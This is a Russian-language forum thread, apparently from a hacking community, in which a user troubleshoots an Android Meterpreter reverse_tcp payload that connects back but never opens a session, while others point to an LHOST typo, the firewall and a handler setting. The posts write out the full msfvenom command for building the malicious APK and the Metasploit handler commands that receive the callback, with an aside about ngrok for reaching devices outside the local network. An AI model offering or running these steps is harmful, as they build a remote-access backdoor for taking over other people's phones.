• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

s unity

Green Team
18.09.2019
207
26
BIT
0
всем приветики!!! такие вот дела: создаю payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -f raw -o /tmp/android.apk
потом:
msf5> use exploit/multi/handler
msf5> exploit(multi/handler) set PAYLOAD android/meterpreter/reverse_tcp
msf5> exploit(multi/handler) set LHOST 192.168.0.105
msf5> exploit(multi/handler) set LPORT 4444
msf5> exploit(multi/handler) exploit
запустился handler и слушает пакеты... в это время скидываю android.apk, запускаю.
такая картина:
[*] Started reverse TCP handler on 192.168.0.105:4444
[*] Sending stage (73550 bytes) to 192.168.0.104


прилетает сессия, handler учуял какие то движения на порту 4444, и все. метерпретер не запускается.
заметьте, это в локальной сети! если пропускать через ngrok сессия (не в локалке) токартина почти такая же. handler пишет что прилетела сессия 1, и так же метерпретер тупа не запускается....
я вот не пойму, это у меня что-то с метерпретером/метасплоитом или же проблема в другом?
PS примерно месяц назад все работало. может это обновления андроида? (обновил дроид неделю назад). не верится что столько лет жили с такой уязвимость, а тут неделю назад решили устранить это..
я бы поробовал на более старой версии андроида но нет его у меня, зато есть вы и codeby.net :D
 
Последнее редактирование:

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
Не знаю опечатался ты тут или у себя в консоле, но ты создаёшь веномский Пайлод для ип 1092.168.0.105

Ну и да дырку могли пофиксать, они не зря свой хлеб кушают
 

s unity

Green Team
18.09.2019
207
26
BIT
0


веномский Пайлод
а в чем разница? метерпретер та один? может я что-то не знаю.... просвети))
вот совсем не хочется думать что там такие балбесы сидят... годами не исправляли, а тут решили исправить...

Не знаю опечатался ты тут или у себя в консоле, но ты создаёшь веномский Пайлод для ип 1092.168.0.105

Ну и да дырку могли пофиксать, они не зря свой хлеб кушают

msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.0.105
LHOST => 192.168.0.105
msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk
[*] Writing 8992 bytes to /tmp/android.apk...
msf payload(reverse_tcp) >

ты про это?
 

s unity

Green Team
18.09.2019
207
26
BIT
0
я тебя не понимаю...
а чем еще создать та ?
с помощью msfvenom я создаю файл .apk в котором сидит пейлоад android/meterpreter/reverse_tcp который будет отправлять сессию на 192.168.0.105 по 4444 порту, который заблаговременно слушает handler.. если что-то не так, поправь меня
 

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
я тебя не понимаю...
а чем еще создать та ?
с помощью msfvenom я создаю файл .apk в котором сидит пейлоад android/meterpreter/reverse_tcp который будет отправлять сессию на 192.168.0.105 по 4444 порту, который заблаговременно слушает handler.. если что-то не так, поправь меня
Да блин, ты внимательно посмотри на параметр LHOST.
Я тебе говорю, что я не знаю где ты опечатался - тут или у себя в консоле. Потому что в сообщении ты написал 1092.168 и далее
 

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
окей, тогда по порядку. Порт 4444 в фаерволе открыл?

ещё чекни этот параметр для листнера
Код:
msf exploit(handler) > set EXITONSESSION false
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!